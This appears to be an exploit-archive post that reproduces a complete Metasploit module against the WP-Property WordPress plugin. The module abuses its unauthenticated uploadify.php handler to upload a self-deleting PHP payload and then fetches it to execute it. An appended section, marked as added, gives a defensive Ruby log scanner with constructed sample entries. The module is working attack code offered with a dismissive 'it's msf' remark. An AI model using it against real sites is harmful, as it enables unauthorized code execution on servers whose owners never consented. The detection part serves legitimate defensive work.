WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it. I mean, it's msf.
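
A defender-side check for the request pattern the module produces, as an added example that is not part of the original post or of Metasploit: it scans web access logs for successful POSTs to the plugin's uploadify.php and for PHP files later served from the same uploadify directory. It assumes the "combined" access-log format; the function name, the SHIPPED_PHP allowlist and the sample log lines are constructed for illustration.

```ruby
# Added example, not part of the original post. Assumes "combined" access-log
# format; SAMPLE_LOG lines are constructed, and SHIPPED_PHP is an assumption to
# extend with the .php files the plugin itself ships in that directory.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
SHIPPED_PHP   = ['uploadify.php'].freeze
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<verb>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3}) /

# Returns findings as hashes: { kind:, ip:, ts:, file:, after_upload: }.
def scan_uploadify(lines)
  uploaders = {} # client IPs that already POSTed to uploadify.php
  lines.each_with_object([]) do |line, findings|
    m = LOG_RE.match(line) or next
    path = m[:path].split('?', 2).first
    idx = path.index(UPLOADIFY_DIR) or next
    file = path[(idx + UPLOADIFY_DIR.length)..-1]
    next unless m[:status] == '200' && file.downcase.end_with?('.php')

    if m[:verb] == 'POST' && file == 'uploadify.php'
      # The multipart body (Filedata, folder) is not logged, so every
      # successful POST to the handler is reported for review.
      uploaders[m[:ip]] = true
      findings << { kind: :upload_post, ip: m[:ip], ts: m[:ts], file: file, after_upload: false }
    elsif !SHIPPED_PHP.include?(file)
      # A PHP file served from the upload directory that the plugin does not ship.
      findings << { kind: :unexpected_php, ip: m[:ip], ts: m[:ts], file: file,
                    after_upload: uploaders.key?(m[:ip]) }
    end
  end
end

# Constructed sample lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = <<~LOG.lines
  198.51.100.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.9 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"
  203.0.113.9 - - [04/Jan/2013:19:41:11 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 74 "-" "-"
  203.0.113.9 - - [04/Jan/2013:19:41:12 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/example.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.7 - - [04/Jan/2013:19:45:00 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 900 "-" "-"
LOG

scan_uploadify(SAMPLE_LOG).each { |f| puts f }
```

Because the module sends the destination in the request's `folder` field, an uploaded file can land outside this directory; the POST finding is the one to triage first.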